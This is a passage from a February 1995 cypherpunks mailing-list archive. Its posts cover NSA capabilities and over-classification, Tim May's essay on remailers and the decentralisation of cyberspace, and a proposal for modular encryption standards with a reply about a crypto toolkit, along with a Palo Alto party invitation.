>distributed computing and workstations, and companies like Sun
>rose from nowhere to become major players.
>
>If the NSA were a corporation, they would be apologizing to their
>shareholders, restructuring, and trying to identify a market
>niche they could continue to be a player in.  Since they are
>funded by government, we don't see them doing this, but it is
>absurd to suggest that they are still decades ahead of the rest
>of the world in basic research and technology.

As a former civilian TS Clearance holder working for the government, I can 
tell you I was amazed at what a small percentage of classified material 
really deserves to be classified.  90% of what I saw could be categorized as 
1)trival, 2)in the public domain already, or 3)politically embarrassing.  
For example, look at the long classified human radiation experiments just 
coming to light. The government certainly wasn't hidding that info from the 
Russians, they were hiding it from the voters. I remember once fighting for 
months to get access to some classified papers on the fracture 
characteristics of ceramics only to find them to contain nothing that hadn't 
been available in the public domain for 20 years. This of course has a lot 
to do with the strange sociology of government bureacracies where the 
combination of classified information with need-to-know restrictions create 
powerful petty-fiefdoms that lead to increased perks and prestige.  The 
other thing to realize is that inside the bureacracies there's little in the 
way of the vigorous competion of ideas (primarily because of the 
manipulation of need-to-know restrictions) that characterizes academia.  
Bureaucracies tend to foster myopia and tunnel vision rather than risk 
taking and originality.  My guess (and it's only that) is that if all of 
NSA's secrets were laid bare, maybe 10% of what they have would be truely 
unique and the other 90% would be surprisingly pedestrian.

Dale H.

------------------------------------------------------------
  Dale W. Harrison, president       |  TEL: (713) 682-0501
  AEGIS Software Development, Inc.  |  FAX: (713) 623-0030
  12 Greenway Plaza, Suite 1100     |  aegis@netcom.com
  Houston, Texas 77046              |  daleh@ix.netcom.com
------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lile Elam <lile@art.net>
Date: Mon, 13 Feb 95 01:00:13 PST
To: cypherpunks@toad.com
Subject: you are invited...
Message-ID: <199502130853.AAA16195@art.net>
MIME-Version: 1.0
Content-Type: text/plain




		       Valentines & Hearts Party!
		         	   @
		             Bryant's Bend	
		

	Our wonderful house at Bryant's Bend in Palo Alto, is having 
it's annual Valentines Party on Valentines Day and we would love to have 
you join us in the celebrations. 

	We request that everyone who attends cum dressed in women's lingerie 
for this feastive occasion. Anyone showing up at the door "overdressed" 
will not be given entry to this event. I suggest visiting Victoria's Secret
as they are having sales on their silky lingerie... :)

	I realize the notice is short but hope you can make it
				anyways...  :)  


	When:   Tuesday Night (yes, that's this week)
	                  ((Feb 14, 1995))
	Time:   7:30 to late
	Where:	130 Bryant St.
		Palo Alto CA

	What to bring:  Yourselves, any veggie food items you enjoy
               (we're a veggie co-op :) and any drinks. We will
		be providing the atmosphere and some non-alcoholic 
		drinks and small munchies.... Drums and instruments
		are most welcome as well as games... 
		
	Activities for the evening:
		Be prepared to play "Spin the Heart" and "Truth or Dare"
		while you are there. We will also have dancing upstairs and 
		kissing in the famous "Kissin Corner"! So watch where 
		you walk... 


	Directions to this Awesome Party:

	From Highway 101 (North or south):  
	
		Take the University Exit that heads West. Follow
		University Street until you reach Bryant St.
		Make a right onto Bryant St. and follow it to the 
		end. We are the last house on the left hand side
		and are on the corner of Bryant St. and Palo Alto
		Way. It's a big tan house with brown trimmings.
	

Hope to see you there...

-lile

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Lile Elam	    |  "a brush in hand, a wisp of wind, she sighs 
lile@art.net        |   knowing that this will be the great one..."	
http://www.art.net  |						    -lile
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Sun, 12 Feb 95 21:56:03 PST
To: perry@imsi.com
Subject: Re: The NSA (Was Re: Factoring - State of the Art and Predictions )
In-Reply-To: <9502130231.AA19651@snark.imsi.com>
Message-ID: <199502130554.AAA23466@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



	A few weeks back Matt Blaze posted on top ten problems we
face.  I'll add two to that list.  First is our inability to
accurately assess the strength of various government agencies.  We
tend to make very pessimistic assumptions, which tends to be safe, but
having real data on which to base our assumptions would be better.

	The other problem we face is that people like Matt write solid
essays on various things, and no one responds.  People who write
essays, post solid mathematical results, etc, bemoan this pretty
regularly.  Fortunately, this problem is easier to address.  Try to
spend more time on the posts which people took longer on.  Its usually
obvious which those are.  The reason to spend more time on solid posts
is that someone took the time to write well on something.  If they get
solid feedback, they'll do more solid writing, and the quality of
discourse goes up.

Adam


Perry writes:
| The black community also has lots of day-to-day experience that we
| don't have, and they understand both the threat model and the
| practical side of things a lot better than we do.
| 
| Overall, I'd say that in the long run the open community is going to
| catch up regardless of what the NSA likes. That does not mean,
| however, that this is going to happen particularly soon, or that they
| don't still know decades more than we do.


-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Sun, 12 Feb 95 22:09:52 PST
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: The NSA (Was Re: Factoring - State of the Art and Predictions )
In-Reply-To: <199502130554.AAA23466@bwh.harvard.edu>
Message-ID: <Pine.SUN.3.91.950213010531.26741B-100000@access3.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 13 Feb 1995, Adam Shostack wrote:

> Date: Mon, 13 Feb 1995 00:54:21 -0500 (EST)
> From: Adam Shostack <adam@bwh.harvard.edu>
> To: perry@imsi.com
> Cc: Cypherpunks Mailing List <cypherpunks@toad.com>
> Subject: Re: The NSA (Was Re: Factoring - State of the Art and Predictions )
> 
> 
> 	A few weeks back Matt Blaze posted on top ten problems we
> face.  I'll add two to that list.  First is our inability to
> accurately assess the strength of various government agencies.  We
> tend to make very pessimistic assumptions, which tends to be safe, but
> having real data on which to base our assumptions would be better.

What your talking about here is a cypherpunks intelligence capability.
If you think we are thought of as subversive and distasteful now, just 
wait to see what happens if anyone on the list outs the kind of 
information your talking about about e.g., the NSA or the Justice Department.

Were this a private, closely held group instead of a public mailing list, 
you might have a different story.


> 
> 	The other problem we face is that people like Matt write solid
> essays on various things, and no one responds.  People who write
> essays, post solid mathematical results, etc, bemoan this pretty
> regularly.  Fortunately, this problem is easier to address.  Try to
> spend more time on the posts which people took longer on.  Its usually
> obvious which those are.  The reason to spend more time on solid posts
> is that someone took the time to write well on something.  If they get
> solid feedback, they'll do more solid writing, and the quality of
> discourse goes up.

There is a internet lore that says the more valuable and insightful a 
given article is, the less response it gets.

I hope this is right, as most of mine tend to be ignored.


> 
> Adam
> 
> 
> -- 
> "It is seldom that liberty of any kind is lost all at once."
> 						       -Hume
> 

073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Sun, 12 Feb 95 13:23:03 PST
To: cypherpunks@toad.com
Subject: Involve Telcos in activism?
Message-ID: <gate.c97F1c1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


storm@marlin.ssnet.com (Don Melvin):
>        Telecoms have bucks.
>        Telecoms have lawyers.
>        Telecoms are the 'transmission' agents for pretty much all of
>                the internet. Even high speed dedicated T1s are usually
>                from a telecom or two.

That's a laugh! Yes, it would be a good idea to involve telcos in our cause, 
but it was my impression that most cypherpunks expressed derision for the EFF 
for 'compromising' (i.e. being realistic). Telcos do not necessarily share the 
interests of cypherpunks; they want to make money, that's all. They'd love to 
compromise, and provide funding for CDT, Jerry Berman's new lobbying outfit. 
A good example of their attitude is what they do in India, or China. Here none 
of them are too keen to say anything against some of our ancient and idiotic 
laws, and they're all happy to budget for huge and unjustified 'licence fees' 
because they want to lick state ass. They want to grab these huge markets 
before it's too late, free speech be damned.


-----------------------------------------------------------------------------
For Electric Dreams subscriptions and back issues, send a mail to
rishab@arbornet.org with 'get help' as the message Subject.

Rishab Aiyer Ghosh          rishab@dxm.ernet.in           rishab@arbornet.org
Vox +91 11 6853410 Voxmail 3760335       H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: M00012@kanga.stcloud.msus.edu
Date: Sun, 12 Feb 95 23:17:00 PST
To: cypherpunks@toad.com
Subject: standards...
Message-ID: <950213011700.34a5@kanga.stcloud.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Cypherpunks,

Secure encryption programs should be / have (imo):

1.  Dynamic, allowing the user to select types of encryption
    on a per session basis, and to allow them to add crypto
    modules as they are developed in the future.
2.  Easy to use.
3.  All source code availible--allowing users to fully
    compile (and examine) the source code.

Such programs should make use of encryption modules or
libraries, and should be able to easily adapt to new
modules as they become available.

An encryption module standard will help facilitate the
creation of the type of programs decsribed above.


Some feateres...

  I.  Public key encryption.
      A.  Uses slower public key encryption to encrypt one or
          more session keys for one or more block ciphers.
      B.  Be used alone on larger blocks of data.  (The future
          may hold public key encryption algorithms that
          make this practical.)
      C.  Not limited to one public encryption scheme.
      C.  Function/format standards that allow user
          interfaces to implement various public key
          crypto functions.
 II.  Block Ciphers
      A.  Each block cipher has a committee assigned
          identification number.
      B.  Uses of random session key for encrypton for
          non-public key encryption.
          1.)  Random session key is encrypted with
               hash of user supplied password.
          2.)  Encrypted session key is appended to
               ciphertext.
      C.  Functrion/format standards for easier chaining
          of multiple block ciphers in user interfaces
          that implement these functions.
          1.)  Minimize/mitigate/eliminate use of layer
               headers that would serve as known plaintext.
III.  Compression
      A.  Perhaps implemented in the same or similar format
          used for block ciphers.
      B.  Compression with a session key/random buffer
          source?  (Used to alter any tables and/or
          mitigate known plaintext attacks, e.g., if
          5 bits of a header are unused...fill these
          with unpredictible bits to be masked off
          latter during decompression.)
      C.  Function/format standards, even though this will
          be, if a compression function is selected, the
          first function called)
          1.)  Minimize/mitigate/eliminate use of layer
               headers that would serve as known plaintext.
 IV.  Hash functions...
  V.  Validation (password and sig.s)
 VI.  Unpredictible (true random) number generation/distribution.
VII.  Variable key lengths.

Of course, this requires _STANDARDS_.  The cypherpunks are
the ideal people to define these standards (and start writing
such modules).  If others are working on this, I'd like to get
a copy of the standards so that I can contribute some code,
otherwise I am willing to help draft the standards--although
the significance of my contributions might amount to an
occasional unoriginal idea.

Some of the qualities listed above, it seems to me, might call
for the use of C++, although C is preferable.

Mike


- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCRAi8v0bMAAAEEAPd2Gn0tnUbEpituh2XrgtHBzSWg7joLHIFXLIQ2vFOcAlE2
9MxS/XuX0sl+Mm6Ix8Vc7gg0Jutb35PvXHy+TaHk9OuOOGGIWMUspd0GmZFTEdhv
nE49BltVmJpEXOU4vVxtVEMZAeewndRCfypYDRYbG1TpCCtvVrwEeVpjJyiBACEB
AAAAAbQmTWljaGFlbCBTLiBNb3JnYW4gPG1tb3JnYW5AZGlnaWJkLmNvbT6JAJUC
BRAvL9SKvAR5WmMnKIEBATQ5A/9h14BcFvpMX2O98iBOlrNlXvppMdQ8KnOfruBH
usg2tvZmynlajFItfTtaVxHQrQNAeQ+P1Ju846wqx+Y/IYHegvS7u7LvPpXIbPHo
Ko8DOgQkH2I3ko2QcNwDsBQvDxGtmx6wVZa0TXt/mmgHTeU6blhsXmyWvIqkeiah
xLn897QYRE8gTk9UIFVTRSBBRlRFUiAzLTE1LTk1tBFFeHBpcmVzOiAgMy0xNS05
NbQaUGVyc29uYWwgVXNlIG9ubHksIHBsZWFzZS4=
=eO8G
- -----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAgUBLy/ZbbwEeVpjJyiBAQGClQP9FK4Er+WzSe4uAZNxJdqciXlX3XTFGeh2
WDXHF8yAfyPEmKOxnbgdD50sWoTJXf+ZQqcxKiBASn8HNmegPHy7NUFqJnU5+/Ma
oV6TK27doKf06l8B7Q0hLywQgRIWBeRuJqjD2FVr7pynLBYRjnRhHZPt8fHSkGYq
KJ4ui9mBcOA=
=/37d
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Sun, 12 Feb 95 13:23:49 PST
To: cypherpunks@toad.com
Subject: Clinton's No Warrant decree, and insulting dogs
Message-ID: <gate.kq8F1c1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


Brad Dolan <bdolan@use.usit.net>:
> WARRENTLESS SEARCHES CAN NOW BE APPROVED BY FREEH, RENO, DOD, ET.
> AL. AND CONDUCTED BY ANY FED AGENCY.  DUE TO THE CRIME BILL, THE FED
> AGENCIES ARE NOW ALL OPERATING IN CONSOLIDATED "TASK FORCES."

Clinton's recent high-profile resort to executive orders reminds me of 
Yeltsin's 'democracy by decree'. I await with interest an American Chechnya.

However with the latest one he seems not to be ordering anything new, he's
just pulled something out of the legislative hat, he's just using powers
he's been given under the cited subsections of the Foreign Intelligence Act.
He seems happy to follow whatever little safeguards it has. How that Act
was never ruled unconstitutional beats me. 

Why is Clinton kowtowing to the Notional Security Agency and the Federal
Bureau of Instigation all of a sudden? Is this a 'law-and-order' shift to
the right of a New New Democrat?

Can we all stop insulting dogs? Lawrence Detweiler can be safely refered to
as LD. Rottweilers, as a correspondent writes with "great umbrage" in last 
week's Time, are "handsome, noble, courageous and steadfastly loyal."


-----------------------------------------------------------------------------
For Electric Dreams subscriptions and back issues, send a mail to
rishab@arbornet.org with 'get help' as the message Subject.

Rishab Aiyer Ghosh          rishab@dxm.ernet.in           rishab@arbornet.org
Vox +91 11 6853410 Voxmail 3760335       H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: M00012@kanga.stcloud.msus.edu
Date: Sun, 12 Feb 95 23:41:00 PST
To: cypherpunks@toad.com
Subject: Re: Our Ignorance....
Message-ID: <950213014102.34a5@kanga.stcloud.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


> From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
> ...
> BTW, with an eye to avoiding rehashes of old flamewars, this does *not*
> constitute an invitation to scour the subscriber list for *.gov and *.mil and
> announce the results. Consult the archives if in doubt on this point.
>
>  -L. Futplex McCarthy
 
Even so, my guess is that 1/4 to 1/3 of the subscribers to this list
are interested government employees--though the most interested are
not using addresses with .gov or .mil.
 
Mike
o




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Mon, 13 Feb 95 01:54:20 PST
To: cypherpunks@toad.com
Subject: Is Cyberspace Rich Enough?
In-Reply-To: <199502130814.DAA16063@ducie.cs.umass.edu>
Message-ID: <199502130954.BAA19852@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


L. McCarthy wrote:

> Lately, I've had the feeling that majordomo@toad echoes my epistles only back
> to me. None of the longer pieces I've written has elicited so much as a flame 
> from Eric, Perry, or even James in a while.

Should I feel left out by not being mentioned in this set? Or
relieved?

In any case, I agree that most responses are mostly reactive. Though
in defense of the Cypherpunks list, not nearly so reactive as are many
groups. Lots of lists and groups are dominated by in jokes, non
sequitors, and other ephemera. At least this group quite often gets
into meaty issues.

> I've encountered an insidious hazard of high-volume lists (such as this) that
> probably snares other people too. It's altogether too easy to sit at one's
> mailer and merely react to whatever comes along. Obviously, if everyone did
> this all the time, nothing of substance would ever be accomplished. It's
> therapeutic, IMHO, to step back regularly, refocus on one's long term goals
> w.r.t the group, and push new initiatives.

Like a lot of you, I try to do this regularly. If people are
interested, they'll follow up. If not, they won't. Think of it as
evolution in action.

It so happens that the latest theme I've been thinking about is ready
to spring on you folks. If you respond, so be it.

That theme is this: Is cyberspace, or the Net/Web/Etc., sufficiently
rich or complex to meet our needs?

By "rich" or "complex" I mean in terms of "places to go," of "degrees
of freedom." For example, the multiplicity of routing paths for
messages, via remailers explicitly and via the underlying routing
options the Internet itself offers implicitly, gives certain major
advantages that a centralized system vulnerable to "choke points"
would not have. (The Internet gurus will likely jump in at this point
and blather about how this is isn't so, how they could shut down the
Internet in several minutes with just their Leatherman tool and a few
O'Reilly books, but my point is not that it isn't _possible_, but that
the direction in which the Net has moved is generally one that makes
shut-down harder than more centralized alternatives.)

By our "needs" I mean roughly the Cypherpunks goals of privacy, free
choice, cybernetic free association, virtual communities,
anarcho-capitalism, etc. (Quibblers can dispute any of these, but
clearly most active posters on the list advocate some vector made up
of many of these diverse elements.)

So, what am I getting at?

Consider how the abstractions of the World Wide Web, URLs, HTML, HTTP,
and Web browsers have *increased the size of cyberspace* rather
dramatically in just the past two years. More places to visit, more
interconnectedness, more difficulties in controlling access to stuff,
etc. Home pages containing banned material are proliferating (a la the
Homolka-Teale ritualistic cannibalism trial in Canada, the Scientology
material, and so on--this is not the place for me to recap this).
Sure, ftp sites used to do this pretty well; in fact, I'm considering
ftp sites in this "evolution" toward greater complexity (in the
richness sense).

(Actually, cyberspace is partly getting "bigger" and partly
"increasing in dimensionality." Dimensionality of a space can be
related to how many neighbors one has....think of the two nearest
neighbors one has in a 1-D space, the 4 (or 8 if diagonals are
considered) neighbors in a 2-D space, the 6 in a 3-D space, and so on.
Arguably, if one has "100 close neighbors" in a space, it is roughly a
50 dimensional space. An equivalent formulation is in terms of the
radius of the n-sphere that everyone fits into. For example, the "six
degrees of separation," the 6 "handshakes" that separate nearly any
two people in America, suggests that American society is in some
important sense roughly a 15-17 dimensional space, because in some
sense all 250 million Americans "fit into" a hypersphere of radius 3
(diameter 6) when the dimensionality is around 17. (Or slightly lower,
as the slight corrections to V = r ^ n have to be included, which I'm
not bothering with). What "increased connectivity" does is to increase
dimensionality, about as one would expect from our usual metaphors
about "a multidimensional society" and "the world is
shrinking"...indeed it is shrinking, even as the absolute volume
increases.) 

What Cypherpunks should be pushing for, in my view, is this increased
dimensionality. More places to stick things, more places to escape
central control, and more degrees of freedom (which has a nice dual
meaning I once used as the working title for a novel I was working
on).

Is Cyberspace already rich enough (= high enough dimensionality) so
that central control cannot be reestablished (to the extent it ever
existed)?

Many of this think that it probably already is past this point, that
the "point of no return" has been reached. After all, the Soviets
couldn't stop samizdats, the Chinese couldn't stop fax machines, and
the Americans can't stop drug use, so what hope is there in
controlling modems, crypto, cellular phones, satellites, Web links,
stegonography, terabytes of data flowing unobstructed across borders,
and so on. Just to "stop the Net" would disrupt the entire financial
system, which not even Clinton or the next (Republican) President
would be tempted to do....they might as well launch a nuclear war as
try to shut down this "anarchic" ( = high dimensionality) system.

But can we do more? One of my own wishes is to see hundreds (nay,
thousands!) of remailers, as these act as "teleportation booths" which
can dramatically increase connectivity. (They can increase the
connectivity in a different way that just straight connections
can...they "stitch together" otherwise visibly-connected regions with
unobservable connections, a desirable thing.)

What else?

* Lots more remailers. Run out of accounts, not just "remailer
machines." Accounts allow trivial proliferation of more remailers.

* Web access remailers. Like the "anonymous anonymous ftp," why not
explore combining Web systems with remailers? (Not so great for
browsing, of course, but there should be some interesting
possibilities.)

* More offshore sites, members, etc. This increases connectivity and
increases the "regulatory arbitrage" we so often talk about.

* Local corporate computer nets are "extra rooms in cyberspace," and
thus are harder to search. The equivalents of "rat lines" (in which
drugs are kept in one apartment and retrieved through a hole in the
wall, thus delaying/foiling searches and kick-in-the-door
raids....think of how technology makes all this so much easier).

* digital cash is of course of central importance. It glues commerce
together, but also greases it (a dual metaphor, not a mixed one). In
terms of the "richness" I'm talking about, it incentivizes the
colonization of cyberspace, the expansion of this space, and the
general richness.

* Alternative Nets, like FIDONet, are often lost in the discussion of
"the Net," but perhaps we should take much greater interest in these
alternatives. They make a crackdown harder, they lessen the dangers of
a single-point attack, and they provide "genetic diversity" for
building future Nets. (I'm not saying Cypherpunks have the time,
expertise, or incentive to work on this, but just reminding folks that
the Internet is not the end all and be all...)

* More users, more education, more articles....all increase
dimensionality, by expanding the space (e.g., key software on more
machines, accessible by more people, more home pages, etc.).

And so on. Increase the richness of cyberspace. More places, more
avenues, more rooms, more more. Make sure there's a "there," there.

Well, I've written too much, and as folks have noted, long posts get
fewer responses that do short ones, especially flamish ones.

Personally, I think there are fewer long essays and analyses for the
same reason there are fewer large predators than grass-munching
herbivores.

--Tim May


-- 

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Sun, 12 Feb 95 23:21:41 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Our Ignorance of Govt. Capabilities
In-Reply-To: <Pine.SUN.3.91.950213010531.26741B-100000@access3.digex.net>
Message-ID: <199502130723.CAA15970@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn writes:
> If you think we are thought of as subversive and distasteful now, just 
> wait to see what happens if anyone on the list outs the kind of 
> information your talking about about e.g., the NSA or the Justice Department.
> 
> Were this a private, closely held group instead of a public mailing list, 
> you might have a different story.

IMHO, people generally don't share that sort of 
information here because they don't possess it, not because they fear
potential repercussions. Plenty of list subscribers seem able to shed their
inhibitions quite easily when it comes to criticizing organizations and 
revealing information. Full utilization of the most advanced available
remailer features offers at least the appearance of sufficient anonymity
for most people, AFAI can tell.

[Perhaps we could run a short survey: please respond if you could dish dirt 
 on a government security agency, but do not plan to do so on this list   ;]

BTW, with an eye to avoiding rehashes of old flamewars, this does *not*
constitute an invitation to scour the subscriber list for *.gov and *.mil and
announce the results. Consult the archives if in doubt on this point.

-L. Futplex McCarthy



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (A Loose Affiliation of Millionaires and Billionaires and Babies)
Date: Sun, 12 Feb 95 23:49:24 PST
To: cypherpunks@toad.com
Subject: Re: Q: ref. for DNA used to solve math. network prob. (fwd)
Message-ID: <199502130745.CAA25356@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----


The Adleman paper is on the web (I put it up).  The url is:

	http://www.hks.net/~cactus/doc/science/molecule_comp.html

I never completed typing the perspectives article since an article
appeared in Science that implied that Science doesn't consider it kosher
to reprint their articles.  As a member of the AAAS, I'm a bit appalled
by this position but for the moment I've stopped any progress on
entering Science articles into the Web.

Enjoy,
- - --
Todd Masco     | "Let me get this straight.  You're making a crypto toolkit,
cactus@hks.net |  and you're worried about it being _obscure_?" - Eric Hughes
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLz7VORNhgovrPB7dAQHd3gQAgXnpCEQRIxzO6VQSarHhK7nH9j4kncbi
IlJawMbNnCf1RD9P3OD7art0w+180luFRJW9d93C5lq3Z36XhCOCgrcHrnGausCM
D87DWCEYECMxjuMa362NC1u79UGQ5MThwb4Tl6/kttYzLYyRfCiJLRwexJs5B6mX
6PaKGuNQDV4=
=Vgdm
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLz8OFCoZzwIn1bdtAQFC3QGA39rHlZeQgpkQwtsTv0JUEK4UyftbMqSK
I8IHti1XiwbwSGgc6zzg5ga0ChRg0B8P
=pXZq
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Mon, 13 Feb 95 00:12:59 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Does Anyone Even Read This Stuff ? (was Re: The NSA)
In-Reply-To: <Pine.SUN.3.91.950213010531.26741B-100000@access3.digex.net>
Message-ID: <199502130814.DAA16063@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack writes:
> 	The other problem we face is that people like Matt write solid
> essays on various things, and no one responds.  People who write
> essays, post solid mathematical results, etc, bemoan this pretty
> regularly.

I agree that this is a problem, but perhaps not so much as we might think.
For one thing, communication sometimes develops in private. For instance, I
exchanged some mail with Matt about Caller ID after his Top 10 Problems list.
More importantly, it takes much more time, and in some cases expertise, to 
compose a good response to a long discourse than to reply to a short opinion
piece or news report. Relatively few people have the time and ability to
formulate a significant extension or rebuttal to a major work. This is
natural and inevitable. It's probably unrealistic to expect a much greater
frequency of such messages.

Black Unicorn writes:
# There is a internet lore that says the more valuable and insightful a 
# given article is, the less response it gets.
# I hope this is right, as most of mine tend to be ignored.

Lately, I've had the feeling that majordomo@toad echoes my epistles only back
to me. None of the longer pieces I've written has elicited so much as a flame 
from Eric, Perry, or even James in a while.

As they say, "opinions are like assholes", and it's easy to argue about them.
Netiquette strenously discourages people from simply agreeing. This can be
carried too far.

I've encountered an insidious hazard of high-volume lists (such as this) that
probably snares other people too. It's altogether too easy to sit at one's
mailer and merely react to whatever comes along. Obviously, if everyone did
this all the time, nothing of substance would ever be accomplished. It's
therapeutic, IMHO, to step back regularly, refocus on one's long term goals
w.r.t the group, and push new initiatives.

-L. Futplex McCarthy



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (A Loose Affiliation of Millionaires and Billionaires and Babies)
Date: Mon, 13 Feb 95 00:22:11 PST
To: cypherpunks@toad.com
Subject: Re: standards...
Message-ID: <199502130818.DAA25598@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----


>Such programs should make use of encryption modules or
>libraries, and should be able to easily adapt to new
>modules as they become available.

Hmmm.  Did you come in late, or have you seen my posts about the crypto
library I'm working on ("Hastur Crypto Toolkit," nee "GUCAPI")?

>  I.  Public key encryption.
>      C.  Not limited to one public encryption scheme.

AFAIK, RSA is the only feasible PK scheme available.  There's eliptic
curves, of course, but that's patented.

> II.  Block Ciphers

Needn't be block.  Stream cipher works perfectly well for the "fast crypto"
symetric cipher part.

>      A.  Each block cipher has a committee assigned
>          identification number.

Why a number?  When you can choose between a number and a human-readable
string (and space is not a big issue), choose human-readable.

>      B.  Uses of random session key for encrypton for
>          non-public key encryption.
>          1.)  Random session key is encrypted with
>               hash of user supplied password.
>          2.)  Encrypted session key is appended to
>               ciphertext.

Hmmm.   If the session key is a hash of a password, then why on Earth
would you include it?  

>      C.  Functrion/format standards for easier chaining
>          of multiple block ciphers in user interfaces
>          that implement these functions.
>          1.)  Minimize/mitigate/eliminate use of layer
>               headers that would serve as known plaintext.

We shouldn't be using ciphers that are vulnerable to "known plaintext"
attacks.  RSA is known to be vulnerable to "chosen plaintext" attacks
(see Schneier), but is useful enough that we work around this shortcoming
by RSA encrypting only hashes and session keys.

>III.  Compression
>      A.  Perhaps implemented in the same or similar format
>          used for block ciphers.

Naturally.  In fact, encoding, encryption, and compression are the same
thing: mapping one set of numbers into another.

>Of course, this requires _STANDARDS_.  The cypherpunks are
>the ideal people to define these standards (and start writing
>such modules).  If others are working on this, I'd like to get
>a copy of the standards so that I can contribute some code,
>otherwise I am willing to help draft the standards--although
>the significance of my contributions might amount to an
>occasional unoriginal idea.

As far I know, there are two standards: the PKCS #11 document from 
RSADSI, which I do not care to follow if I can avoid it.  The other
is the IETF GSSAPI, which should be accomodated.

In general, I very much agree with the thrust of what you're saying.
Which is why I'm folding the crypto work I already have to do for
my company into the larger "general solution" approach.

If you haven't read my postings on GUCAPI/Hastur, please go back and
take a look (send me mail if you'd like a copy).  It very much sounds
to me like you're addressing the same problem that I've been hacking
full-time for the last month or so.

If you're interested in helping, the best things that could possibly
be provided is code released to the public domain that implements:

	- Good random number generators for Macs and PCs, or
	- Implementations of the non-RSAREF symetric ciphers and hashes,
	 incl. IDEA, RC4, RC5, BLOWFISH, MD4, MD5, SAPPHIRE, GOST,
         SHA, LUC, and LOKI91.  Or any others that seem like a good idea.
	
I'll mention some miscellaneous features that will be in the library
that I haven't brought up yet:

	- It will be trivial to make the UNIX-style filter programs
	that Perry and Matt desire.
	- Specification of a format for outgoing and incoming messages
	will be trivial.  All known old formats (PGP 2.*, RIPEM, etc)
	will be supported by including format specs.

Key _management_ will *not* be supported, though public keys _will_
be imported from PGP and PEM key rings as well as X.509 certificates with
no judgement as to trust (see message from Eric Hughes from the middle
of last week).  Some key translation (x.509 --> PGP) services might be
provided.
- - --
Todd Masco     | "If we don't make utter fools of ourselves from time to time,
cactus@hks.net |  we grow smug - that is, we do not grow at all." - T. Peters
     Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLz7c3hNhgovrPB7dAQHGdQP+Idvw/FxnPgR49z70DCMqgHV6w3UEds3f
vdm0E5P7+3evSB++iTuP/NzOP92CCnen9VTlFX+gAab61g8T9mfT5mYMu3B9iCvi
PWo3/+3XFinypShYJaYyZHWaHkYJtse7A7rFgLhoqQXNPFYdPeSh5XSJqugtfHIm
wK37TDUptS4=
=3wi6
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
